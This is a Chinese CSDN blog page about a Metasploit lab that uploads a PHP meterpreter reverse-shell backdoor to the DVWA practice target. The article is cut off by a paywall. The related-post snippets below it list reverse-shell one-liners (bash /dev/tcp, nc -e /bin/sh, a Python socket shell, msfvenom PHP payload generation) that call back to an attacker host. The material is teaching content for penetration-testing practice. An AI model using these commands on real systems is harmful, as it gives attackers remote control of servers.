msf渗透练习-php后门反弹

最新推荐文章于 2025-05-11 16:28:29 发布
最新推荐文章于 2025-05-11 16:28:29 发布
阅读量3.2k 收藏 10
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 黑客学习 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49349476/article/details/131134045
文章介绍了后门反弹的概念,这是一种攻击者在入侵计算机后安装后门程序,通过反向Shell进行远程控制的技术。实验演示了如何在KaliLinux中利用Meterpreter生成和上传PHP后门到DVWA靶场,并展示了在目标机器上执行各种命令以获取控制权的过程,包括系统信息获取、权限提升、密码哈希提取等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

说明:
本章内容,仅供学习,不要用于非法用途(做个好白帽)

(一)后门反弹是什么

后门反弹是指攻击者在成功入侵一台计算机后,在目标计算机上安装一个“后门程序”,将该程序与反向Shell连接在一起。这种“后门程序”通常是一个被精心编写的脚本、软件工具或操作系统的恶意修改版本,它会在被攻击的计算机上隐藏起来,并开辟一个特殊的端口以便远程控制攻击者的Shell来操纵计算机。

当攻击者使用后门程序进行攻击时,它会向预定义的攻击者主机发起连接,允许攻击者通过反向Shell和目标计算机进行远程连接。这样,攻击者就能够利用这个“后门程序”,在经过登录验证的情况下轻松地远程控制目标计算机。在许多情况下,攻击者通过这种方式来执行各种恶意操作,包括修改或操纵系统文件、查看、篡改、窃取用户敏感信息等。

(二)实验演示

1、使用监控模块-handler

 use exploit/multi/handler

2、配置攻击负载设置payload

设置php的攻击负载payload:
 

命令:set  payload php/meterpreter/reverse_tcp



最低0.47元/天 解锁文章

200万优质内容无限畅学
反弹shell以及常见的反弹Shell语句原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-31 579
什么是反弹shell?原词为reverse shell,含义如下 控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。 其本质就是实现客户端与服务端的互换 反弹shell利用原因 初学时我们不禁有这样的疑问,为什么我们要用反弹shell呢?我们时候利用反弹shell呢?解释如下 为什么要用反弹shell 这里不以CTF举例,以相对更真实一点的渗透过程来举例,比如你作为攻击方,成功向目标处上传了木马文件,可以执行一些语句,我们想获取一个可以直接操作主机的虚拟终端,这个时
PHP 函数、PHP 简单后门
weixin_51559599的博客
10-24 378
test();可变函数也叫变量函数动态函数,函数名可以动态设置和调用,变量()。这是PHP 特性之一,这种特性通常会被攻击者所利用。直接把函数名赋值给变量,通过修改变量的值,可以实现动态调用。PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。php// 相当于 a();// 可以直接使用变量的值充当函数名// 执行结果,输出 This is function a?
Metasploit反弹shell.php实验(window)
最新发布
m0_51781051的博客
05-11 580
这是一种基于 PHP 的 Meterpreter shell,通过反向 TCP 协议与攻击者机器建立连接。:这是生成的恶意文件的名称。生成的文件是一个包含 PHP 代码的文件,运行后会在目标机器上执行 Meterpreter shell,并尝试与攻击者机器建立连接。这可以增加对抗检测的能力,因为每次生成的 payload 都是不同的。参数表示本地主机的 IP 地址,即攻击者机器的 IP 地址。:这是 Metasploit 框架中的一个工具,用于生成恶意负载(payload),例如木马、后门等。
msf反弹shell
weixin_34179762的博客
05-15 1085
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗ 反弹shell的两种方法 第一种Msfvenom实例: 1、msfconsole    #启动msf 2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to...
msf反弹php shell,msf反弹shell - osc_u4ki5b6h的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_34230075的博客
03-22 503
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗反弹shell的两种方法 第一种Msfvenom实例:1、msfconsole    #启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php    #生成反弹shell文件LHOST表示本地攻击机的ip,LPO...
PHP代码实现反弹shell
E1even的博客
08-28 4058
打靶机的时候遇到了,有时候反弹效果失败,下面这个PHP代码基本可以通杀 转载至链接:https://www.cnblogs.com/alex-13/p/3667790.html <?php function which($pr) { $path = execute("which $pr"); return ($path ? $path : $pr); } function execute($cfe) { $res = ''; if ($cfe) { if(function_exists(
msf反弹php shell,msf构造出shell反弹脚本
weixin_39669769的博客
03-22 912
Liunx下能够构造shell反弹脚本有很多常见的如bash,netcat、socat以及各种语言,当然今天主要内容是详细介绍msfvenom如何生成shell脚本。正文metasploit-framework介绍Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目...
可解析PHP反弹shell方法
06-14 1515
这里拿vulnhub-DC-8靶场反弹shell,详情见。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4864
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
靶机渗透SickOs1.2(非常详细,适合新手渗透
君莫hacker的博客
09-08 7524
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
渗透测试学习目录
liupc的学习笔记
05-04 3609
1. 行业术语扫盲 2. 3.
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
Eason_LYC安全白帽子的成长博客
10-19 1254
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
msf生成php反弹,反弹shell总结
weixin_29967445的博客
04-13 1564
1.bash反弹bash -i >& /dev/tcp/ip_address/port 0>&12.nc反弹nc -e /bin/sh 192.168.2.130 44443.pythonimport socket,subprocess,oss =socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(( "1...
php反弹,php反弹shell实现代码
weixin_39532754的博客
03-10 542
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无 奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpsp...
php结合msf反弹内网shell
aiquan9342的博客
07-17 683
感谢: perl6大佬分享的姿势。 MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > gen...
php反弹教程,详解NC反弹shell的几种方法
weixin_39625586的博客
04-02 1064
假如ubuntu、CentOS为目标服务器系统kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用最终是将ubuntu、CentOS的shell反弹到kali上正向反弹shellubuntu或者CentOS上面输入nc -lvp 7777 -e /bin/bashkali上输入nc ip 7777正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹s...
PHP Webshell 下的反弹 Shell
XtAbap的博客
10-08 660
Webshell 是一种常见的恶意软件,它允许攻击者通过一个受感染的网站来执行远程命令和控制目标服务器。其中一种常见的攻击技术是通过 Webshell 反弹一个 Shell 连接,以便攻击者能够直接与目标服务器进行交互并执行命令。通过编写一个 PHP 脚本,我们可以在目标服务器上建立一个反向连接,并与攻击者的机器进行交互。然而,使用 Webshell 进行非法活动是违法的,且严重违反道德和法律规定。要实现反弹 Shell,我们需要编写一个 PHP 脚本,该脚本将作为 Webshell 在目标服务器上执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值